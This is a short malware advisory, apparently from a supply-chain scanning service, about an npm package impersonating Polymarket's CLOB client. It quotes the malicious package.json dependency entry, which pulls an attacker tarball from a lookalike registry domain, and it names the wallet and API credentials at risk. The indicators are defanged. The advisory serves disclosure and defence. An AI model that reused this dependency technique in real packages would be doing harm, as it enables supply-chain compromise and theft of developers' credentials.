LWA-2026-12670 confirmed malware

@polymarkets/clob-client-v2@1.0.5

Malicious code in @polymarkets/clob-client-v2 (npm)

T1195.002 · Compromise Software Supply ChainT1036.005 · Match Legitimate Resource Name or Location

Analysis

@polymarkets/clob-client-v2 impersonates Polymarket's official CLOB TypeScript SDK (description "TypeScript client for Polymarket's CLOB", repository github[.]com/dev-polymarket/clob-client-v2) but its package.json declares a runtime dependency resolved from a lookalike registry domain instead of the npm registry: "dependencies": { "typescript-eslint": "hxxps://registrynpmjs[.]to/typescript-eslint-8[.]58[.]2[.]tgz", ... } registrynpmjs.to is a combosquat of registry[.]npmjs[.]org. Because the entry sits in the runtime "dependencies" block, every `npm install` of this package fetches and executes an attacker-controlled tarball from that host, giving the operator arbitrary code execution in the installer's environment. The package is aimed at developers handling Polymarket wallet private keys and CLOB API credentials (CLOB_API_KEY, CLOB_SECRET, CLOB_PASS_PHRASE), which the dependency's install-time code can reach. The shipped dist/ bundles contain no lifecycle hooks or obfuscation of their own — the payload is the dependency spec itself. IOC: hxxps://registrynpmjs[.]to/typescript-eslint-8[.]58[.]2[.]tgz (host registrynpmjs.to)

analyzed by
Leitwacht
first seen
Oct 8, 2026, 12:31 AM
analyzed
Oct 8, 2026, 12:02 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.